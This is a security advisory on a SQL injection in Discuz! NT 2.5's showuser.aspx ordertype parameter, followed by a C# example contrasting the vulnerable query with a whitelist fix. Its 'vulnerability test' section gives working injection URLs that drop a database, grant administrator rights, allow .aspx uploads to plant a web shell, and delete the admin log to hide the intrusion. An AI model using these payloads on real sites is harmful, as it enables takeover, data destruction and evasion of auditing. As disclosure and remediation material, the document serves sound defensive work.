Users running Discuz! NT 2.5, or who have just upgraded to the Discuz! NT 2.5 forum version, should pay attention to this article and check the official website promptly for a fix.
Vulnerability description: Discuz! NT 2.5 is a community software package from Comsenz (Beijing) Technology Co., Ltd. built on the ASP.NET platform. Based on the .NET Framework, it supports SQL Server by default and can be extended to Access, MySQL and other databases; it runs on IIS5, IIS6 and IIS7, makes full use of ASP.NET features, lets users freely switch skins, and can convert data from a variety of other forums.
Discuz! NT 2.5 extends the forum feature set, improves speed, stability and load capacity, and on that foundation offers optional feature packages such as item trading, personal spaces and photo albums that users can install as they choose, demonstrating strong extensibility. In terms of features, performance and supported environments it is among the most mature ASP.NET community packages available. However, an Isto member found a security vulnerability: a successful exploit can directly modify the administrator's password, log in to the back end with administrator privileges, and control the entire site.
Vendor: http://www.comsenz.com
Vulnerability analysis: in Discuz! NT 2.5 (pre-20080826 update), the Showuser.aspx page does not properly handle the OrderType variable, which leads to SQL injection. An attacker does not even need a registered account; a carefully constructed ordertype value is enough to exploit this vulnerability.
Vulnerability test:
Http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop Database kj;–
Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid= ' 1′,groupid= ' 1′where username= ' Webtets '; –//update to Admin
Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension= ' aspx ' where extension= ' jpg ' ; –//update to ASPX can be uploaded
After getting the shell ...
Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension= ' jpg ' where extension= ' aspx ' ; –//update back to JPG
Http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from Dnt_adminvisitlog where username= ' webtets '; –//Delete log
Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users Set adminid= ", groupid=" where username= ' webtets ' ; –//Cancel Admin
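The root cause above is that a request value meant to be "asc" or "desc" is concatenated into the SQL text, so a ";" in it starts a second statement on SQL Server. The following C# is an added illustration written for this article, not Discuz! NT code: the query text, the hypothetical helper names and the TOP 50 limit are assumptions; the dnt_users table and its username and groupid columns are the names given in the advisory.

```csharp
using System;
using System.Collections.Generic;

// Hypothetical helper illustrating the defect class in showuser.aspx:
// the sort direction comes straight from the query string.
public static class UserListQuery
{
    // Vulnerable pattern: the raw request value is concatenated into the SQL text.
    // On SQL Server, a ';' in ordertype terminates the SELECT and everything
    // after it runs as an additional statement (stacked queries).
    public static string BuildVulnerable(string orderType)
    {
        return "SELECT TOP 50 username, groupid FROM dnt_users ORDER BY username " + orderType;
    }

    // Hardened pattern: an ORDER BY direction cannot be passed as a SqlParameter,
    // so map the request value onto a fixed whitelist and reject everything else.
    // Only the whitelisted literal, never the user-supplied string, reaches the SQL text.
    private static readonly Dictionary<string, string> Directions =
        new Dictionary<string, string>(StringComparer.OrdinalIgnoreCase)
        {
            { "asc", "ASC" },
            { "desc", "DESC" },
        };

    public static string BuildSafe(string orderType)
    {
        if (orderType == null || !Directions.TryGetValue(orderType.Trim(), out string direction))
        {
            throw new ArgumentException("ordertype must be 'asc' or 'desc'");
        }
        return "SELECT TOP 50 username, groupid FROM dnt_users ORDER BY username " + direction;
    }

    public static void Main()
    {
        // Constructed inputs: a normal value and a stacked-query value of the kind shown above.
        string[] inputs = { "desc", "DESC ", "desc;update dnt_users set groupid=1" };
        foreach (string input in inputs)
        {
            try
            {
                Console.WriteLine("accepted: " + BuildSafe(input));
            }
            catch (ArgumentException ex)
            {
                // The stacked-query input is rejected before any SQL is built.
                Console.WriteLine("rejected: " + ex.Message);
            }
        }
    }
}
```

The same whitelist approach applies to any sort column or direction taken from the request; the fix is to select from fixed SQL fragments rather than sanitize the user string.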